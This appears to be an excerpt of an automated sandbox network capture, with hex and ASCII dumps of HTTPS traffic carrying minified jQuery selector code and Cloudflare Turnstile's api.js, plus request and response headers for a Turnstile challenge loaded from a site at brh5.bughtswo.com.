                                                            2025-01-07 19:24:57 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                            Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                            2025-01-07 19:24:57 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                            Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                            2025-01-07 19:24:57 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                            Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                            2025-01-07 19:24:57 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                            Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                            2025-01-07 19:24:57 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                            Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                            2025-01-07 19:24:57 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                            Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                            2025-01-07 19:24:57 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                            Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.849726104.18.94.414435496C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 19:24:57 UTC383OUTGET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 19:24:57 UTC471INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 19:24:57 GMT
                                                            Content-Type: application/javascript; charset=UTF-8
                                                            Content-Length: 47521
                                                            Connection: close
                                                            accept-ranges: bytes
                                                            last-modified: Thu, 02 Jan 2025 13:52:36 GMT
                                                            cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                            access-control-allow-origin: *
                                                            cross-origin-resource-policy: cross-origin
                                                            Server: cloudflare
                                                            CF-RAY: 8fe654bc1d768ca2-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-07 19:24:57 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                            Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                            2025-01-07 19:24:57 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                            Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                            2025-01-07 19:24:57 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                            Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                            2025-01-07 19:24:57 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                            Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                                            2025-01-07 19:24:57 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                            Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                            2025-01-07 19:24:57 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                            Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                            2025-01-07 19:24:57 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                            Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                            2025-01-07 19:24:57 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                            Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                            2025-01-07 19:24:57 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                            Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                            2025-01-07 19:24:57 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                            Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.849727104.18.95.414435496C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 19:24:57 UTC797OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/djxe4/0x4AAAAAAAxHfCcO_DpISAPE/auto/fbE/normal/auto/ HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            sec-ch-ua-platform: "Windows"
                                                            Upgrade-Insecure-Requests: 1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: navigate
                                                            Sec-Fetch-Dest: iframe
                                                            Referer: https://brh5.bughtswo.com/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 19:24:57 UTC1362INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 19:24:57 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 26636
                                                            Connection: close
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                            content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                            cross-origin-embedder-policy: require-corp
                                                            cross-origin-opener-policy: same-origin
                                                            cross-origin-resource-policy: cross-origin
                                                            origin-agent-cluster: ?1
